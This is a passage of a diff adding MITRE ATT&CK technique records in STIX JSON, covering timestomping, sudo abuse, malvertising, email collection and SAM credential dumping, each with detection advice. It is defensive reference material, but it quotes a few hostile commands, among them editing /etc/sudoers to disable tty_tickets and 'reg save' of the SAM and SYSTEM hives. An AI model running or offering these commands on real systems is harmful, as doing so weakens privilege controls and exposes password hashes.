sdclt.exe. Retrieved May 25, 2017.", + "url": "https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/" + }, + { + "source_name": "TechNet Inside UAC", + "description": "Russinovich, M. (2009, July). User Account Control: Inside Windows 7 User Account Control. Retrieved July 26, 2016.", + "url": "https://technet.microsoft.com/en-US/magazine/2009.07.uac.aspx" + }, + { + "source_name": "Fortinet Fareit", + "description": "Salvio, J., Joven, R. (2016, December 16). Malicious Macro Bypasses UAC to Elevate Privilege for Fareit Malware. Retrieved December 27, 2016.", + "url": "https://blog.fortinet.com/2016/12/16/malicious-macro-bypasses-uac-to-elevate-privilege-for-fareit-malware" + }, + { + "source_name": "Github UACMe", + "description": "UACME Project. (2016, June 16). UACMe. Retrieved July 26, 2016.", + "url": "https://github.com/hfiref0x/UACME" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Timestomp", + "description": "Adversaries may take actions to hide the deployment of new, or modification of existing files to obfuscate their activities. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools. Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools. (Citation: WindowsIR Anti-Forensic Techniques)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [ + "Romain Dumont, ESET" + ], + "x_mitre_detection": "Forensic techniques exist to detect aspects of files that have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques) It may be possible to detect timestomping using file modification monitoring that collects information on file handle opens and can compare timestamp values.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_defense_bypassed": [ + "Host forensic analysis" + ], + "x_mitre_permissions_required": [ + "User", + "Administrator", + "SYSTEM" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--128c55d3-aeba-469f-bd3e-c8996ab4112a", + "created": "2017-05-31T21:31:12.675Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1099", + "external_id": "T1099" + }, + { + "source_name": "WindowsIR Anti-Forensic Techniques", + "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", + "url": "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Internet Connection Discovery", + "description": "Adversaries may check for Internet connectivity on compromised systems. This may be performed during automated discovery and can be accomplished in numerous ways such as using [Ping](https://attack.mitre.org/software/S0097), tracert, and GET requests to websites.\n\nAdversaries may use the results and responses from these requests to determine if the system is capable of communicating with their C2 servers before attempting to connect to them. The results may also be used to identify routes, redirectors, and proxy servers.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Command and Control, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to check Internet connectivity.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--132d5b37-aac5-4378-a8dc-3127b18a73dc", + "created": "2021-03-17T15:28:10.689Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1016/001", + "external_id": "T1016.001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-05-11T14:00:00.188Z", + "name": "Sudo and Sudo Caching", + "description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The sudo command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"(Citation: sudo man page 2018) Since sudo was made for the system administrator, it has some useful configuration features such as a timestamp_timeout, which is the amount of time in minutes between instances of sudo before it will re-prompt for a password. This is because sudo has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at /var/db/sudo with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a tty_tickets variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, /etc/sudoers, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like user1 ALL=(ALL) NOPASSWD: ALL.(Citation: OSX.Dok Malware) Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, /var/db/sudo's timestamp can be monitored to see if it falls within the timestamp_timeout range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if tty_tickets is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled tty_tickets to potentially make scripting easier by issuing echo \\'Defaults !tty_tickets\\' >> /etc/sudoers.(Citation: cybereason osx proton) In order for this change to be reflected, the malware also issued killall Terminal. As of macOS Sierra, the sudoers file has tty_tickets enabled by default.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "On Linux, auditd can alert every time a user's actual ID and effective ID are different (this is what happens when you sudo). This technique is abusing normal functionality in macOS and Linux systems, but sudo has the ability to log all input and output based on the LOG_INPUT and LOG_OUTPUT directives in the /etc/sudoers file.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "root" + ], + "x_mitre_permissions_required": [ + "User" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1365fe3b-0f50-455d-b4da-266ce31c23b0", + "created": "2020-01-30T14:34:44.992Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1548/003", + "external_id": "T1548.003" + }, + { + "source_name": "sudo man page 2018", + "description": "Todd C. Miller. (2018). Sudo Man Page. Retrieved March 19, 2018.", + "url": "https://www.sudo.ws/" + }, + { + "source_name": "OSX.Dok Malware", + "description": "Thomas Reed. (2017, July 7). New OSX.Dok malware intercepts web traffic. Retrieved July 10, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/04/new-osx-dok-malware-intercepts-web-traffic/" + }, + { + "source_name": "cybereason osx proton", + "description": "Amit Serper. (2018, May 10). ProtonB What this Mac Malware Actually Does. Retrieved March 19, 2018.", + "url": "https://www.cybereason.com/blog/labs-proton-b-what-this-mac-malware-actually-does" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:56:59.396Z", + "name": "Loss of View", + "description": "Adversaries may cause a sustained or permanent loss of view where the ICS equipment will require local, hands-on operator intervention; for instance, a restart or manual operation. By causing a sustained reporting or visibility loss, the adversary can effectively hide the present state of operations. This loss of view can occur without affecting the physical processes themselves. (Citation: Corero) (Citation: Michael J. Assante and Robert M. Lee) (Citation: Tyson Macaulay)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.0", + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--138979ba-0430-4de6-a128-2fc0b056ba36", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0829", + "external_id": "T0829" + }, + { + "source_name": "Corero", + "description": "Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 ", + "url": "https://www.corero.com/resources/files/whitepapers/cns_whitepaper_ics.pdf" + }, + { + "source_name": "Michael J. Assante and Robert M. Lee", + "description": "Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/industrial-control-system-cyber-kill-chain-36297" + }, + { + "source_name": "Tyson Macaulay", + "description": "Tyson Macaulay Michael J. Assante and Robert M. Lee Corero Industrial Control System (ICS) Security Retrieved. 2019/11/04 The Industrial Control System Cyber Kill Chain Retrieved. 2019/11/04 RIoT Control: Understanding and Managing Risks and the Internet of Things Retrieved. 2019/11/04 ", + "url": "https://books.google.com/books?id=oXIYBAAAQBAJ&pg=PA249&lpg=PA249&dq=loss+denial+manipulation+of+view&source=bl&ots=dV1uQ8IUff&sig=ACfU3U2NIwGjhg051D_Ytw6npyEk9xcf4w&hl=en&sa=X&ved=2ahUKEwj2wJ7y4tDlAhVmplkKHSTaDnQQ6AEwAHoECAgQAQ#v=onepage&q=loss%20denial%20manipulation%20of%20view&f=false" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2021-04-29T14:49:39.188Z", + "name": "Archive via Custom Method", + "description": "An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Custom archival methods can be very difficult to detect, since many of them use standard programming language concepts, such as bitwise operations.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--143c0cbb-a297-4142-9624-87ffc778980b", + "created": "2020-02-20T21:09:55.995Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1560/003", + "external_id": "T1560.003" + }, + { + "source_name": "ESET Sednit Part 2", + "description": "ESET. (2016, October). En Route with Sednit - Part 2: Observing the Comings and Goings. Retrieved November 21, 2016.", + "url": "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-05T20:45:22.041Z", + "name": "Modify Cloud Compute Infrastructure", + "description": "An adversary may attempt to modify a cloud account's compute service infrastructure to evade defenses. A modification to the compute service infrastructure can include the creation, deletion, or modification of one or more components such as compute instances, virtual machines, and snapshots.\n\nPermissions gained from the modification of infrastructure components may bypass restrictions that prevent access to existing infrastructure. Modifying infrastructure components may also allow an adversary to evade detection and remove evidence of their presence.(Citation: Mandiant M-Trends 2020)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Establish centralized logging for the activity of cloud compute infrastructure components. Monitor for suspicious sequences of events, such as the creation of multiple snapshots within a short period of time or the mount of a snapshot to a new instance by a new or unexpected user. To reduce false positives, valid change management procedures could introduce a known identifier that is logged with the change (e.g., tag or header) if supported by the cloud provider, to help distinguish valid, expected actions from malicious ones.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--144e007b-e638-431d-a894-45d90c54ab90", + "created": "2019-08-30T18:03:05.864Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1578", + "external_id": "T1578" + }, + { + "source_name": "Mandiant M-Trends 2020", + "description": "Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020.", + "url": "https://content.fireeye.com/m-trends/rpt-m-trends-2020" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-04-19T12:24:40.659Z", + "name": "Network Devices", + "description": "Adversaries may compromise third-party network devices that can be used during targeting. Network devices, such as small office/home office (SOHO) routers, may be compromised where the adversary's ultimate goal is not [Initial Access](https://attack.mitre.org/tactics/TA0001) to that environment -- instead leveraging these devices to support additional targeting.\n\nOnce an adversary has control, compromised network devices can be used to launch additional operations, such as hosting payloads for [Phishing](https://attack.mitre.org/techniques/T1566) campaigns (i.e., [Link Target](https://attack.mitre.org/techniques/T1608/005)) or enabling the required access to execute [Content Injection](https://attack.mitre.org/techniques/T1659) operations. Adversaries may also be able to harvest reusable credentials (i.e., [Valid Accounts](https://attack.mitre.org/techniques/T1078)) from compromised network devices.\n\nAdversaries often target Internet-facing edge devices and related network appliances that specifically do not support robust host-based defenses.(Citation: Mandiant Fortinet Zero Day)(Citation: Wired Russia Cyberwar)\n\nCompromised network devices may be used to support subsequent [Command and Control](https://attack.mitre.org/tactics/TA0011) activity, such as [Hide Infrastructure](https://attack.mitre.org/techniques/T1665) through an established [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Botnet](https://attack.mitre.org/techniques/T1584/005) network.(Citation: Justice GRU 2024)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Gavin Knapp" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--149b477f-f364-4824-b1b5-aa1d56115869", + "created": "2024-03-28T03:29:35.616Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1584/008", + "external_id": "T1584.008" + }, + { + "source_name": "Wired Russia Cyberwar", + "description": "Greenberg, A. (2022, November 10). Russia’s New Cyberwarfare in Ukraine Is Fast, Dirty, and Relentless. Retrieved March 22, 2023.", + "url": "https://www.wired.com/story/russia-ukraine-cyberattacks-mandiant/" + }, + { + "source_name": "Mandiant Fortinet Zero Day", + "description": "Marvi, A. et al.. (2023, March 16). Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation. Retrieved March 22, 2023.", + "url": "https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem" + }, + { + "source_name": "Justice GRU 2024", + "description": "Office of Public Affairs. (2024, February 15). Justice Department Conducts Court-Authorized Disruption of Botnet Controlled by the Russian Federation’s Main Intelligence Directorate of the General Staff (GRU). Retrieved March 28, 2024.", + "url": "https://www.justice.gov/opa/pr/justice-department-conducts-court-authorized-disruption-botnet-controlled-russian" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-17T15:32:39.470Z", + "name": "Malvertising", + "description": "Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. \n\nAdversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) \n\nMalvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)\n\nAdversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Tom Hegel", + "Goldstein Menachem", + "Hiroki Nagahama, NEC Corporation", + "Manikantan Srinivasan, NEC Corporation India", + "Pooja Natarajan, NEC Corporation India", + "Juan Carlos Campuzano - Mnemo-CERT" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--155207c0-7f53-4f13-a06b-0a9907ef5096", + "created": "2023-02-21T20:46:57.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1583/008", + "external_id": "T1583.008" + }, + { + "source_name": "BBC-malvertising", + "description": "BBC. (2011, March 29). Spotify ads hit by malware attack. Retrieved February 21, 2023.", + "url": "https://www.bbc.com/news/technology-12891182" + }, + { + "source_name": "FBI-search", + "description": "FBI. (2022, December 21). Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users. Retrieved February 21, 2023.", + "url": "https://www.ic3.gov/Media/Y2022/PSA221221" + }, + { + "source_name": "sentinelone-malvertising", + "description": "Hegel, Tom. (2023, January 19). Breaking Down the SEO Poisoning Attack | How Attackers Are Hijacking Search Results. Retrieved February 21, 2023.", + "url": "https://www.sentinelone.com/blog/breaking-down-the-seo-poisoning-attack-how-attackers-are-hijacking-search-results/" + }, + { + "source_name": "spamhaus-malvertising", + "description": "Miller, Sarah. (2023, February 2). A surge of malvertising across Google Ads is distributing dangerous malware. Retrieved February 21, 2023.", + "url": "https://www.spamhaus.com/resource-center/a-surge-of-malvertising-across-google-ads-is-distributing-dangerous-malware/" + }, + { + "source_name": "Masquerads-Guardio", + "description": "Tal, Nati. (2022, December 28). “MasquerAds” — Google’s Ad-Words Massively Abused by Threat Actors, Targeting Organizations, GPUs and Crypto Wallets. Retrieved February 21, 2023.", + "url": "https://labs.guard.io/masquerads-googles-ad-words-massively-abused-by-threat-actors-targeting-organizations-gpus-42ae73ee8a1e" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "Permission Groups Discovery", + "description": "Adversaries may attempt to discover group and permission settings. This information can help adversaries determine which user accounts and groups are available, the membership of users in particular groups, and which users and groups have elevated permissions.\n\nAdversaries may attempt to discover group permission settings in many different ways. This data may provide the adversary with information about the compromised environment that can be used in follow-on activity and targeting.(Citation: CrowdStrike BloodHound April 2018)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "discovery" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Daniel Prizmant, Palo Alto Networks", + "Yuval Avrahami, Palo Alto Networks", + "Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nMonitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Monitor container logs for commands and/or API calls related to listing permissions for pods and nodes, such as kubectl auth can-i.(Citation: K8s Authorization Overview)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Azure AD", + "Office 365", + "SaaS", + "IaaS", + "Linux", + "macOS", + "Google Workspace", + "Containers" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce", + "created": "2017-05-31T21:30:55.471Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1069", + "external_id": "T1069" + }, + { + "source_name": "K8s Authorization Overview", + "description": "Kubernetes. (n.d.). Authorization Overview. Retrieved June 24, 2021.", + "url": "https://kubernetes.io/docs/reference/access-authn-authz/authorization/" + }, + { + "source_name": "CrowdStrike BloodHound April 2018", + "description": "Red Team Labs. (2018, April 24). Hidden Administrative Accounts: BloodHound to the Rescue. Retrieved October 28, 2020.", + "url": "https://www.crowdstrike.com/blog/hidden-administrative-accounts-bloodhound-to-the-rescue/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-29T21:06:03.098Z", + "name": "Email Collection", + "description": "Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "collection" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Swetha Prabakaran, Microsoft Threat Intelligence Center (MSTIC)" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "There are likely a variety of ways an adversary could collect email from a target, each with a different mechanism for detection.\n\nFile access of local system email files for Exfiltration, unusual processes connecting to an email server within a network, or unusual access patterns or authentication attempts on a public-facing webmail server may all be indicators of malicious activity.\n\nMonitor processes and command-line arguments for actions that could be taken to gather local email files. Remote access tools with built-in features may interact directly with the Windows API to gather information. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).\n\nDetection is challenging because all messages forwarded because of an auto-forwarding rule have the same presentation as a manually forwarded message. It is also possible for the user to not be aware of the addition of such an auto-forwarding rule and not suspect that their account has been compromised; email-forwarding rules alone will not affect the normal usage patterns or operations of the email account.\n\nAuto-forwarded messages generally contain specific detectable artifacts that may be present in the header; such artifacts would be platform-specific. Examples include X-MS-Exchange-Organization-AutoForwarded set to true, X-MailFwdBy and X-Forwarded-To. The forwardingSMTPAddress parameter used in a forwarding process that is managed by administrators and not by user actions. All messages for the mailbox are forwarded to the specified SMTP address. However, unlike typical client-side rules, the message does not appear as forwarded in the mailbox; it appears as if it were sent directly to the specified destination mailbox.(Citation: Microsoft Tim McMichael Exchange Mail Forwarding 2) High volumes of emails that bear the X-MS-Exchange-Organization-AutoForwarded header (indicating auto-forwarding) without a corresponding number of emails that match the appearance of a forwarded message may indicate that further investigation is needed at the administrator level rather than user-level.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Office 365", + "Google Workspace", + "macOS", + "Linux" + ], + "x_mitre_version": "2.5", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--1608f3e1-598a-42f4-a01a-2e252e81728f", + "created": "2017-05-31T21:31:25.454Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1114", + "external_id": "T1114" + }, + { + "source_name": "Microsoft Tim McMichael Exchange Mail Forwarding 2", + "description": "McMichael, T.. (2015, June 8). Exchange and Office 365 Mail Forwarding. Retrieved October 8, 2019.", + "url": "https://blogs.technet.microsoft.com/timmcmic/2015/06/08/exchange-and-office-365-mail-forwarding-2/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-24T18:53:10.860Z", + "name": "Security Account Manager", + "description": "Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the net user command. Enumerating the SAM database requires SYSTEM level access.\n\nA number of tools can be used to retrieve the SAM file through in-memory techniques:\n\n* pwdumpx.exe\n* [gsecdump](https://attack.mitre.org/software/S0008)\n* [Mimikatz](https://attack.mitre.org/software/S0002)\n* secretsdump.py\n\nAlternatively, the SAM can be extracted from the Registry with Reg:\n\n* reg save HKLM\\sam sam\n* reg save HKLM\\system system\n\nCreddump7 can then be used to process the SAM database locally to retrieve hashes.(Citation: GitHub Creddump7)\n\nNotes: \n\n* RID 500 account is the local, built-in administrator.\n* RID 501 is the guest account.\n* User accounts start with a RID of 1,000+.\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Ed Williams, Trustwave, SpiderLabs", + "Olaf Hartong, Falcon Force" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Hash dumpers open the Security Accounts Manager (SAM) on the local file system (%SystemRoot%/system32/config/SAM) or create a dump of the Registry SAM key to access stored account password hashes. Some hash dumpers will open the local file system as a device and parse to the SAM table to avoid file access defenses. Others will make an in-memory copy of the SAM table before reading hashes. Detection of compromised [Valid Accounts](https://attack.mitre.org/techniques/T1078) in-use by adversaries may help as well.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": 